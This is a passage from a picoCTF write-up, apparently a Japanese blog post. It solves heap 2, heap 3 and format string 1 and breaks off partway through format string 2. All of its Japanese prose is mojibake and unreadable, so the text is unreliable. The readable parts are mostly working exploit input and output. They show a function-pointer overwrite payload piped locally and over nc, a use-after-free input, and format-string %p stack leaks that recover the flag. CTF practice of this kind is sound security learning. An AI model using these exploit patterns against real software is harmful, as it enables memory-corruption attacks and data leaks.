ãƒ’ãƒ¼ãƒ—é ˜åŸŸã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã®å·®ã¯ã€å‰å›žã¨åŒã˜ãã€32byteã§ã™ã€‚
$ heap2/chall
I have a function, I sometimes like to call it, maybe you should change it
1. Print Heap
2. Write to buffer
3. Print x
4. Print Flag
5. Exit
Enter your choice: 1
[*] Address -> Value
+-------------+-----------+
[*] 0x11b86b0 -> pico
+-------------+-----------+
[*] 0x11b86d0 -> bico
1. Print Heap
2. Write to buffer
3. Print x
4. Print Flag
5. Exit
Enter your choice: 4
Segmentation fault
表層解æžã‚‚ã‚„ã£ã¦ãŠãã¾ã™ã€‚No PIE(プãƒã‚°ãƒ©ãƒ 自身ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã®ãƒ©ãƒ³ãƒ€ãƒ 化ãŒç„¡åŠ¹ï¼‰ã«å¤‰ã‚ã£ã¦ã„ã¾ã™ã€‚ã“ã‚Œã§ã€win関数ã¯å¸¸ã«åŒã˜ã‚¢ãƒ‰ãƒ¬ã‚¹ã¨ã„ã†ã“ã¨ã«ãªã‚Šã¾ã™ã€‚
$ file heap2/chall
heap2/chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=d5184d264ae0c1259ba3bb7a1e20fc348b4274b0, for GNU/Linux 3.2.0, with debug_info, not stripped
$ checksec --file=heap2/chall
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 51 Symbols No 0 2 heap2/chall
win関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’å–å¾—ã—ã¾ã™ã€‚
$ nm heap2/chall | grep win
00000000004011f0 T check_win
00000000004011a0 T win
32byteã®ä»»æ„ã®æ–‡å—列ã®å¾Œã«ã€ã“ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’入れã¦ã‚ã’ã‚Œã°ã„ã„ã¯ãšã§ã™ã€‚
普通ã«ã‚„ã‚‹ã¨ã€ãƒã‚¤ãƒŠãƒªã®å…¥åŠ›ãŒå‡ºæ¥ãªã„ã®ã§ã€echo を使ã£ã¦å…¥åŠ›ã—ã¾ã™ã€‚番å·ã®å…¥åŠ›ã‚‚å¿…è¦ãªã®ã§ã€ç•ªå·ã¨æ”¹è¡Œã‚’組ã¿åˆã‚ã›ã¾ã™ã€‚無事ã€ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œã¾ã—ãŸã€‚
$ echo -e '2\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\x11\x40\x00\n4\n' | heap2/chall
I have a function, I sometimes like to call it, maybe you should change it
1. Print Heap
2. Write to buffer
3. Print x
4. Print Flag
5. Exit
Enter your choice: Data for buffer:
1. Print Heap
2. Write to buffer
3. Print x
4. Print Flag
5. Exit
Enter your choice: picoCTF{FLAGFLAGFLAG}
インスタンスを起動ã—ã¦ã€åŒã˜ã‚ˆã†ã«ã™ã‚Œã°ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œã¾ã—ãŸãŒã€å®Ÿè¡Œæ–¹æ³•ã ã‘書ã„ã¦ãŠãã¾ã™ã€‚
$ echo -e '2\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\x11\x40\x00\n4\n' | nc mimas.picoctf.net 50227
heap 3(200ãƒã‚¤ãƒ³ãƒˆï¼‰
最後㮠heapå•é¡Œã§ã™ã€‚
Medium ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall.c)㌠1ã¤ãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚åŒã˜ãƒ•ã‚¡ã‚¤ãƒ«åã§ã™ã€‚インスタンス(サーãƒï¼‰ã‚‚èµ·å‹•ã§ãã¾ã™ã€‚
heap 3å•é¡Œ
ソースã¯å¤§ãã変ã‚ã£ã¦ã„ãŸã®ã§ã€æ™®é€šã«ã‚„ã£ã¦ã„ãã¾ã™ã€‚
表層解æžã§ã™ã€‚heap 2 ã¨åŒã˜ã§ã™ãã€ãƒ¡ãƒ¢ãƒªå®Ÿè¡Œç¦æ¢ã€ãƒ—ãƒã‚°ãƒ©ãƒ 自身ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯ãƒ©ãƒ³ãƒ€ãƒ 化ã•ã‚Œãªã„ã§ã™ã€‚
$ file heap3/chall
heap3/chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3fa64145c4efbd5a267e0525f58e294fba23ad2f, for GNU/Linux 3.2.0, with debug_info, not stripped
$ checksec --file=heap3/chall
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 52 Symbols No 0 2 heap3/chall
ソースコードを確èªã—ã¾ã™ã€‚
最åˆã«ã€objectæ§‹é€ ä½“ã®é ˜åŸŸãŒç¢ºä¿ã•ã‚Œã€flagメンãƒå¤‰æ•°ãŒ "bico" ã§åˆæœŸåŒ–ã•ã‚Œã¦ã„ã¾ã™ã€‚flagメンãƒå¤‰æ•°ã‚’ "pico" ã«å¤‰æ›´ã§ãã‚‹ã¨ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œãã†ã§ã™ã€‚
今回ã¯ã€ã¾ãšã€å…¥åŠ›ã—ãŸå€¤ã®ã‚µã‚¤ã‚ºã§ malloc関数ã§é ˜åŸŸã‚’確ä¿ã—ã€ã•ã‚‰ã«å€¤ãŒæ›¸ãè¾¼ã‚るよã†ã§ã™ã€‚ã‚ã¨ã€ãƒ¡ãƒ¢ãƒªã‚’解放ã™ã‚‹æ©Ÿèƒ½ã‚‚ã‚ã‚Šã¾ã™ã€‚
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define FLAGSIZE_MAX 64
typedef struct {
char a[10];
char b[10];
char c[10];
char flag[5];
} object;
int num_allocs;
object *x;
void check_win() {
if(!strcmp(x->flag, "pico")) {
printf("YOU WIN!!11!!\n");
char buf[FLAGSIZE_MAX];
FILE *fd = fopen("flag.txt", "r");
fgets(buf, FLAGSIZE_MAX, fd);
printf("%s\n", buf);
fflush(stdout);
exit(0);
} else {
printf("No flage for u :(\n");
fflush(stdout);
}
}
void print_menu() {
printf("\n1. Print Heap\n2. Allocate object\n3. Print x->flag\n4. Check for win\n5. Free x\n6. "
"Exit\n\nEnter your choice: ");
fflush(stdout);
}
void init() {
printf("\nfreed but still in use\nnow memory untracked\ndo you smell the bug?\n");
fflush(stdout);
x = malloc(sizeof(object));
strncpy(x->flag, "bico", 5);
}
void alloc_object() {
printf("Size of object allocation: ");
fflush(stdout);
int size = 0;
scanf("%d", &size);
char* alloc = malloc(size);
printf("Data for flag: ");
fflush(stdout);
scanf("%s", alloc);
}
void free_memory() {
free(x);
}
void print_heap() {
printf("[*] Address -> Value \n");
printf("+-------------+-----------+\n");
printf("[*] %p -> %s\n", x->flag, x->flag);
printf("+-------------+-----------+\n");
fflush(stdout);
}
int main(void) {
init();
int choice;
while (1) {
print_menu();
if (scanf("%d", &choice) != 1) exit(0);
switch (choice) {
case 1:
print_heap();
break;
case 2:
alloc_object();
break;
case 3:
printf("\n\nx = %s\n\n", x->flag);
fflush(stdout);
break;
case 4:
check_win();
break;
case 5:
free_memory();
break;
case 6:
return 0;
default:
printf("Invalid choice\n");
fflush(stdout);
}
}
}
何ã¨ãªãã€ã‚„ã‚Šæ–¹ãŒåˆ†ã‹ã£ãŸæ°—ãŒã—ã¾ã™ã€‚Use After Free ã¨ã„ã†æ‰‹æ³•ã§ã™ã€‚malloc関数ã§ç¢ºä¿ã—ãŸé ˜åŸŸã‚’解放ã—ãŸå¾Œã‚‚å‚ç…§ã—ã¦ã—ã¾ã†ï¼ˆobjectæ§‹é€ ä½“ã® flag ã‚’å‚ç…§ã—ã¦ã—ã¾ã†ï¼‰ã“ã¨ã‚’利用ã—ã¦ã€è§£æ”¾ã—ãŸé ˜åŸŸã‚’確ä¿ã—ã¦åˆ¥ã®å€¤ã«æ›¸ãæ›ãˆã‚‹æ‰‹æ³•ã§ã™ã€‚
objectæ§‹é€ ä½“ã®é ˜åŸŸã‚’解放ã—ãŸå¾Œã€åŒã˜ãƒ’ãƒ¼ãƒ—é ˜åŸŸã‚’ç¢ºä¿ã™ã‚‹å¿…è¦ãŒã‚ã‚Šã¾ã™ã€‚ãã®ãŸã‚ã«ã¯ã€malloc関数ã®ä»•çµ„ã¿ã‚’知る必è¦ãŒã‚ã‚Šã¾ã™ã€‚malloc関数ã¯ã€ã„ã‚ã‚“ãªãƒªã‚¹ãƒˆã§é ˜åŸŸã‚’管ç†ã—ã¦ã„ã¾ã™ãŒã€æœ€åˆã«ä½¿ã‚れる tcache bins を知ã£ã¦ãŠã‘ã°ã€ä»Šå›žã®å•é¡Œã¯è§£ã‘ãã†ã§ã™ã€‚
malloc関数ã®åŸºæœ¬çš„ãªä»•çµ„ã¿ã¨ã—ã¦ã€ãƒ’ãƒ¼ãƒ—é ˜åŸŸã¯ãƒãƒ£ãƒ³ã‚¯ã¨ã„ã†ãƒ–ãƒãƒƒã‚¯ã§ç®¡ç†ã•ã‚Œã¦ã„ã¦ã€æœ€å°ã®ãƒãƒ£ãƒ³ã‚¯ãŒ 0x20(32byte)ã€0x10(16byte)å˜ä½ã«ãªã£ã¦ã„ã¾ã™ã€‚tcache bins ã¯ã€è§£æ”¾ã•ã‚ŒãŸãƒãƒ£ãƒ³ã‚¯ã®ã‚µã‚¤ã‚ºã®ç¨®é¡žã¨ã—ã¦ã€0x20 ã‹ã‚‰ 0x410(1040byte)ã¾ã§ã€0x10 刻ã¿ã§ 64種類ã‚ã‚Šã€ãã‚Œãžã‚Œã®ã‚µã‚¤ã‚ºã”ã¨ã« 7個ã¾ã§ä¿æŒã§ãるよã†ã«ãªã£ã¦ã„ã‚‹ãã†ã§ã™ã€‚
今回ã®å ´åˆã€objectæ§‹é€ ä½“ã®é ˜åŸŸã‚’解放ã—ãŸã®ã§ã€tcache bins ã«ãã®é ˜åŸŸãŒç™»éŒ²ã•ã‚Œã¦ã„ã‚‹ã¯ãšã§ã™ã€‚次㫠malloc関数ã§åŒã˜ã‚µã‚¤ã‚ºã‚’è¦æ±‚ã™ã‚‹ã¨ã€è§£æ”¾ã•ã‚ŒãŸé ˜åŸŸãŒå†åˆ©ç”¨ã•ã‚Œã‚‹ã¯ãšã§ã™ã€‚
ã¾ãšã€objectæ§‹é€ ä½“ã®ã‚µã‚¤ã‚ºã‚’æ£ç¢ºã«çŸ¥ã‚‹ãŸã‚ã«ã€GDB ã§ç¢ºèªã—ã¾ã™ã€‚今回ã‹ã‚‰ã€gdb-peda ã‹ã‚‰ GDB拡張㮠pwndbg ã«å¤‰æ›´ã—ã¦ã„ã¾ã™ã€‚
objectæ§‹é€ ä½“ã® x をダンプã—ã¦ã¿ã‚‹ã¨ã€30byte ã®ã‚ªãƒ•ã‚»ãƒƒãƒˆã§ã€"bico" ãŒæ ¼ç´ã•ã‚Œã¦ã„ã¾ã—ãŸã€‚ã¤ã¾ã‚Šã€éš™é–“ãªãæ§‹é€ ä½“ã®ãƒ¡ãƒ³ãƒã¯ç¢ºä¿ã•ã‚Œã¦ã„ã‚‹ã“ã¨ã«ãªã‚Šã¾ã™ã€‚ã¾ãŸã€x を解放ã—ãŸã‚ã¨ã€pwndbg ã® heapコマンドã§è¦‹ã‚‹ã¨ã€tcache bins ã®ã‚µã‚¤ã‚º 0x30(48byte)ã«ç™»éŒ²ã•ã‚Œã¦ã„ã‚‹ã“ã¨ãŒç¢ºèªã§ãã¾ã—ãŸã€‚16byteå˜ä½ã§ã€objectæ§‹é€ ä½“ã®ã‚µã‚¤ã‚ºã¯ 35byte ãªã®ã§ã€é †å½“ã¨è¨€ãˆã¾ã™ã€‚
pwndbg> p x
$1 = (object *) 0x4056b0
pwndbg> x/40xb 0x4056b0
0x4056b0: 0x05 0x04 0x00 0x00 0x00 0x00 0x00 0x00
0x4056b8: 0x0c 0xff 0xb5 0x9a 0xa4 0xa4 0xbe 0x90
0x4056c0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x4056c8: 0x00 0x00 0x00 0x00 0x00 0x00 0x62 0x69
0x4056d0: 0x63 0x6f 0x00 0x00 0x00 0x00 0x00 0x00
pwndbg> heap -v
Free chunk (tcachebins) | PREV_INUSE
Addr: 0x4056a0
prev_size: 0x00
size: 0x30 (with flag bits: 0x31)
fd: 0x405
bk: 0x90bea4a49ab5ff0c
fd_nextsize: 0x00
bk_nextsize: 0x6962000000000000
次ã«ã€35byte ã®ãƒ¡ãƒ¢ãƒªé ˜åŸŸã‚’確ä¿ã—ã¾ã™ã€‚ãã®ç¢ºä¿ã—ãŸé ˜åŸŸã®å…ˆé アドレスãŒã€x ã¨åŒã˜ 0x4056b0 ã«ãªã£ã¦ã„ã‚‹ã“ã¨ã‚’期待ã—ã¦ã„ã¾ã™ã€‚
ã§ã¯ã€å®Ÿéš›ã« malloc関数実行後ã§ãƒ–レークã—ã¦ã€ç¢ºèªã—ã¦ã¿ã¾ã—ãŸã€‚見ã«ãã„ã‹ã‚‚ã—ã‚Œã¾ã›ã‚“ãŒã€malloc関数ã®æˆ»ã‚Šå€¤ã® RAX ㌠0x4056b0 ã«ãªã£ã¦ã„ã‚‹ã“ã¨ãŒç¢ºèªã§ãã¾ã—ãŸã€‚
malloc関数実行後
ã“ã®å¾Œã€30æ–‡å—ã® "A" 㨠"pico" を入力ã™ã‚‹ã“ã¨ã«ã‚ˆã‚Šã€ãƒ•ãƒ©ã‚°ã‚’表示ã§ãã¾ã—ãŸã€‚
ã§ã¯ã€ã‚µãƒ¼ãƒã«å¯¾ã—ã¦ã‚„ã£ã¦ã¿ã¾ã™ã€‚
$ nc tethys.picoctf.net 54843
freed but still in use
now memory untracked
do you smell the bug?
1. Print Heap
2. Allocate object
3. Print x->flag
4. Check for win
5. Free x
6. Exit
Enter your choice: 5
1. Print Heap
2. Allocate object
3. Print x->flag
4. Check for win
5. Free x
6. Exit
Enter your choice: 2
Size of object allocation: 35
Data for flag: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico
1. Print Heap
2. Allocate object
3. Print x->flag
4. Check for win
5. Free x
6. Exit
Enter your choice: 4
YOU WIN!!11!!
picoCTF{xxx}
ã“ã‚Œã§ãƒ’ープシリーズã¯å®Œäº†ã§ã™ã€‚
次ã¯ã€format string シリーズã§ã™ã€‚ã“ã¡ã‚‰ã‚‚å…¨4å•ã‚ã£ã¦ã€ã“ã‚ŒãŒ2å•ç›®ã§ã™ã€‚
Medium ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆformat-string-1)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆformat-string-1.c)㌠1ã¤ãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ã¾ãŸã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ï¼ˆã‚µãƒ¼ãƒï¼‰ã‚’èµ·å‹•ã§ãã¾ã™ã€‚
format string 1å•é¡Œ
ソースコードを「format string 0ã€ã¨æ¯”較ã—ã¾ã—ãŸãŒã€ã ã„ã¶é•ã†ã®ã§ã€æ™®é€šã«ã‚„ã£ã¦ã„ãã¾ã™ã€‚
表層解æžã§ã™ã€‚メモリ実行ç¦æ¢ã€ãƒ—ãƒã‚°ãƒ©ãƒ ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ãƒ©ãƒ³ãƒ€ãƒ 化ã¯ç„¡åŠ¹ã§ã™ã€‚
$ file format-string-1
format-string-1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62bc37ea6fa41f79dc756cc63ece93d8c5499e89, for GNU/Linux 3.2.0, not stripped
$ checksec --file=format-string-1
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 41 Symbols No 0 2 format-string-1
ã¾ãšå®Ÿè¡Œã—ã¦ã¿ã¾ã™ã€‚ã†ãƒ¼ã‚“ã€ä»–ã«ãƒ•ã‚¡ã‚¤ãƒ«ãŒå¿…è¦ãªã‚ˆã†ã§ã™ã€‚
$ ./format-string-1
'secret-menu-item-1.txt' file not found, aborting.
ソースをèªã¿ã¾ã™ã€‚
ファイル㌠2ã¤å¿…è¦ã‚‰ã—ã„ã®ã§ã€é©å½“ãªæ–‡å—列を書ã„ãŸãƒ•ã‚¡ã‚¤ãƒ«ã‚’用æ„ã—ã¾ã™ã€‚用æ„ã—㟠1番目ã®ãƒ•ã‚¡ã‚¤ãƒ«ã‚’èªã¿å‡ºã—ã¦ã€ãƒãƒ¼ã‚«ãƒ«ã®é…列変数ã«è¨å®šã—ã€æ¬¡ã¯ã€flag.txt ã‚’èªã¿å‡ºã—ã¦ã€ãƒãƒ¼ã‚«ãƒ«ã®é…列変数ã«è¨å®šã—ã¾ã™ã€‚次ã«ã€2番目ã®ãƒ•ã‚¡ã‚¤ãƒ«ã‚’èªã¿å‡ºã—ã¦ã€ãƒãƒ¼ã‚«ãƒ«ã®é…列変数ã«è¨å®šã—ã¾ã™ã€‚最後ã«ã€ãƒ¦ãƒ¼ã‚¶å…¥åŠ›ã‚’最大 1024æ–‡å—å—ã‘å–ã£ã¦ã€ãれを表示ã—ã¦çµ‚了ã§ã™ã€‚
最後ã®ãƒ¦ãƒ¼ã‚¶ãŒå…¥åŠ›ã—ãŸæ–‡å—列を表示ã—ã¦ã‚‹ã¨ã“ã‚ã«å•é¡ŒãŒã‚ã‚Šãã†ã§ã™ã€‚
#include <stdio.h>
int main() {
char buf[1024];
char secret1[64];
char flag[64];
char secret2[64];
FILE *fd = fopen("secret-menu-item-1.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-1.txt' file not found, aborting.\n");
return 1;
}
fgets(secret1, 64, fd);
fd = fopen("flag.txt", "r");
if (fd == NULL){
printf("'flag.txt' file not found, aborting.\n");
return 1;
}
fgets(flag, 64, fd);
fd = fopen("secret-menu-item-2.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-2.txt' file not found, aborting.\n");
return 1;
}
fgets(secret2, 64, fd);
printf("Give me your order and I'll read it back to you:\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your order: ");
printf(buf);
printf("\n");
fflush(stdout);
printf("Bye!\n");
fflush(stdout);
return 0;
}
以下ã«ã€ã‚¹ã‚¿ãƒƒã‚¯ã®çŠ¶æ…‹ã‚’æ•´ç†ã—ã¾ã™ã€‚
| アドレス |
サイズ |
内容 |
| rbp |
- |
- |
| rbp - 0x410 |
0x400 |
buf |
| rbp - 0x450 |
0x40 |
secret1 |
| rbp - 0x490 |
0x40 |
flag |
| rbp - 0x4d0 |
0x40 |
secret2 |
ã§ã¯ã€ç°¡å˜ã«å®Ÿè¡Œã—ã¦ã¿ã¾ã™ã€‚ユーザãŒå…¥åŠ›ã—ãŸæ–‡å—列をã€ãã®ã¾ã¾å‡ºåŠ›ã—ã¦ã„ã¾ã™ã€‚書å¼æ–‡å—列攻撃ãŒå‡ºæ¥ãã†ã§ã™ã€‚
$ ./format-string-1
Give me your order and I'll read it back to you:
AAAA
Here's your order: AAAA
Bye!
ã§ã¯ã€æ›¸å¼æ–‡å—列攻撃をã—ã¦ã¿ã¾ã™ã€‚x86 ã¨é•ã£ã¦ã€x86-64 ã¯ã€å¼•æ•°ã«ã„ãã¤ã‹ã®ãƒ¬ã‚¸ã‚¹ã‚¿ã‚’使ã„ã€ãã®å¾Œã€ã‚¹ã‚¿ãƒƒã‚¯ã‚’使ã„ã¾ã™ã€‚よã£ã¦ã€çµæ§‹ãŸãã•ã‚“ %p を使ã†å¿…è¦ãŒã‚ã‚Šãã†ã§ã™ã€‚
後ã‚ã®æ–¹ã«ã€AAAABBBB(0x4242424241414141)ãŒå‡ºç¾ã—ã¾ã—ãŸã€‚printf関数ã®å¼•æ•°ã¨ã—ã¦ã€RDI を使ã„ã¾ã™ã€‚以é™ã® RSIã€RDXã€RCXã€R8ã€R9 ãŒã€ã¾ãšè¡¨ç¤ºã•ã‚Œã¾ã™ã€‚ãã®å¾Œã€ã‚¹ã‚¿ãƒƒã‚¯ãƒã‚¤ãƒ³ã‚¿ãŒæŒ‡ã—ã¦ã„ã‚‹ã¨ã“ã‚(rbp - 0x4d0)ã‹ã‚‰ã€8byteãšã¤è¡¨ç¤ºã•ã‚Œã¾ã™ã€‚buf ã¯ã€rbp - 0x410 ãªã®ã§ã€AAAABBBB ãŒå‡ºç¾ã™ã‚‹ã®ã¯ã€8byte ㌠24個表示ã•ã‚ŒãŸå¾Œã«ãªã‚Šã¾ã™ã€‚ã“ã® 24個(0x120 / 8 = 24)ã«ã¯ã€ãƒ•ãƒ©ã‚°ã‚‚å«ã¾ã‚Œã¾ã™ã€‚
$ echo -e 'AAAABBBB%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p' | ./format-string-1
Give me your order and I'll read it back to you:
Here's your order: AAAABBBB0x402118,(nil),(nil),0x402116,0x7ffff7f9ba80,0x6d2d746572636573,0x6d6574692d756e65,0x7478742e322d,0x3,(nil),0x7ffff7fc3c68,0x9,(nil),0x7b4654436f636970,0x47414c4647414c46,0x7d47414c46,(nil),0x2,0x7ffff7de9147,0x7ffff7fc34e8,0x7ffff7fc3b60,0x6d2d746572636573,0x6d6574692d756e65,0x7478742e312d,0x7ffff7fd4a48,0x2,0x7ffff7fc3b60,0x1,(nil),0x4242424241414141,0x70252c70252c7025,0x252c70252c70252c,0x2c70252c70252c70,0x70252c70252c7025,0x252c70252c70252c,0x2c70252c70252c70
Bye!
フラグã®ä½ç½®ã¯ã€8byte ㌠8個表示ã•ã‚ŒãŸå¾Œãªã®ã§ã€ãƒ¬ã‚¸ã‚¹ã‚¿ã® 5個ã¨åˆã‚ã›ã‚‹ã¨ã€14個目ã¨ã„ã†ã“ã¨ã«ãªã‚Šã¾ã™ã€‚14個目ã‹ã‚‰ã„ãã¤ã‹ã ã‘を表示ã—ã¦ã¿ã¾ã™ã€‚
フラグãŒã©ã“ã¾ã§ç¶šã„ã¦ã„ã‚‹ã‹ã¨ã„ã†ã¨ã€3個目㯠5byteã ã‘ãŒæœ‰åŠ¹ï¼ˆæ®‹ã‚Š3byteã¯ã‚¼ãƒï¼‰ãªã®ã§ã€3個分ã§ãƒ•ãƒ©ã‚°ã‚’表ç¾ã—ã¦ã„るよã†ã§ã™ã€‚
$ echo -e 'AAAABBBB%14$p,%15$p,%16$p,%17$p' | ./format-string-1
Give me your order and I'll read it back to you:
Here's your order: AAAABBBB0x7b4654436f636970,0x47414c4647414c46,0x7d47414c46,0x7feb6fdb7b60
Bye!
フラグã¯ã€0x7b4654436f636970,0x47414c4647414c46,0x7d47414c46, ã§ã™ã€‚
ã‚ã¨ã¯ã€Python ã§è¡¨ç¤ºã™ã‚‹ã ã‘ã§ã™ã€‚
$ python -c 'import struct; print(struct.pack("<QQQ",0x7b4654436f636970,0x47414c4647414c4
6,0x7d47414c46))'
b'picoCTF{FLAGFLAGFLAG}\x00\x00\x00'
サーãƒã§ã‚‚ã€åŒã˜ã‚ˆã†ã«ã™ã‚‹ã¨ãƒ•ãƒ©ã‚°ãŒèªã‚ã¾ã—ãŸã€‚
Medium ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆvuln)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆvuln.c)㌠1ã¤ãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ã¾ãŸã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ï¼ˆã‚µãƒ¼ãƒï¼‰ã‚’èµ·å‹•ã§ãã¾ã™ã€‚ファイルåãŒçªç„¶å¤‰ã‚ã‚Šã¾ã—ãŸã€‚
format string 2å•é¡Œ
ã“ã‚Œã¾ã§ã®ã‚½ãƒ¼ã‚¹ã‚³ãƒ¼ãƒ‰ã¨ç•°ãªã‚‹ã®ã§ã€æ™®é€šã«ã‚„ã£ã¦ã„ãã¾ã™ã€‚表層解æžã§ã™ã€‚メモリ実行ãŒç¦æ¢ã§ã€ãƒ—ãƒã‚°ãƒ©ãƒ ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã®ãƒ©ãƒ³ãƒ€ãƒ 化ã¯ç„¡åŠ¹ã§ã™ã€‚
$ file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=dfe923d97df1df729249ff21202d10ad15d45f4c, for GNU/Linux 3.2.0, not stripped
$ checksec --file=vuln
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 42 Symbols No 0 2 vuln
ソースコードを見ã¦ã¿ã¾ã™ã€‚
「format string 1ã€ã¨ã¡ã‚‡ã£ã¨ä¼¼ã¦ã¾ã™ã€‚ã“ã‚Œã¯ã€ãŠãらãã€æ›¸å¼æ–‡å—列攻撃ã§æ›¸ã込むやã¤ã§ã™ã。
#include <stdio.h>
int sus = 0x21737573;
int main() {
char buf[1024];
char flag[64];
printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your input: ");
printf(buf);
printf("\n");
fflush(stdout);
if (sus == 0x67616c66) {
printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
FILE *fd = fopen("flag.txt", "r");
fgets(flag, 64, fd);
printf("%s", flag);
fflush(stdout);
}
else {
printf("sus = 0x%x\n", sus);
printf("You can do better!\n");
fflush(stdout);
}
return 0;
}
ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã® sus ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’求ã‚ã¾ã™ã€‚
$ nm vuln | grep sus
0000000000404060 D sus
buf ã®ä½ç½®ã‚’確èªã™ã‚‹ãŸã‚ã«ã€ãŸãã•ã‚“ %p を入れã¾ã™ã€‚
14個目㌠buf ã§ã—ãŸã€‚レジスタ㌠5個分ã¨ã€flag ã®é ˜åŸŸãŒ 64byte ãªã®ã§ã€8個分ã‚ã‚‹ãŸã‚ã§ã™ã€‚
$ ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
AAAABBBB%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
Here's your input: AAAABBBB0x402075,(nil),(nil),0x402073,0x7fb70aae3a80,0x2,0x7fb70ab0bb60,0x1,(nil),0x1,0x7fb70ab0b160,0x7fff64eab9b8,0x7fff64eab9c0,0x4242424241414141,0x70252c70252c7025,0x252c70252c70252c,0x2c70252c70252c70,0x70252c70252c7025,0x252c70252c70252c,0x2c70252c70252c70,0x70252c70252c7025,0x252c70252c70252c,0x2c70252c70252c70,0x70252c70252c7025,0x252c70252c70252c,0x2c70252c70252c70,0x70252c70252c7025,0x70252c,0x7fb70ab0b160,0xd,0x7fb70aae3198,0x7fff64eabeb8,0x403e18,0x7fb70ab3f020,0x7fb70ab1cebe,0x1
sus = 0x21737573
You can do better!
AAAABBBB ã®ã¨ã“ã‚ã‚’ã€sus ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«å¤‰ãˆã¦ã¿ã¾ã™ã€‚AAAABBBB ã‹ã‚‰ sus ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«å¤‰ãˆã¦ã‚‚期待通りã«è¡¨ç¤ºã•ã‚Œã‚‹ã‹ã‚’確èªã—ã¦ã¿ã¾ã™ã€‚
æ€ã£ãŸé€šã‚Šã«ã¯ã„ãã¾ã›ã‚“ã§ã—ãŸã€‚途ä¸ã§ã‚¼ãƒãŒå…¥ã‚‹ãŸã‚ã€printf関数ã¯ã€æ–‡å—列ã¨ã—ã¦ã€å…ˆé ã®3byteã ã‘ã‚’èªè˜ã—ãŸã‚ˆã†ã§ã™ã€‚
$ echo -e '\x60\x40\x40\x00\x00\x00\x00\x00%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p' | ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: `@@
sus = 0x21737573
You can do better!
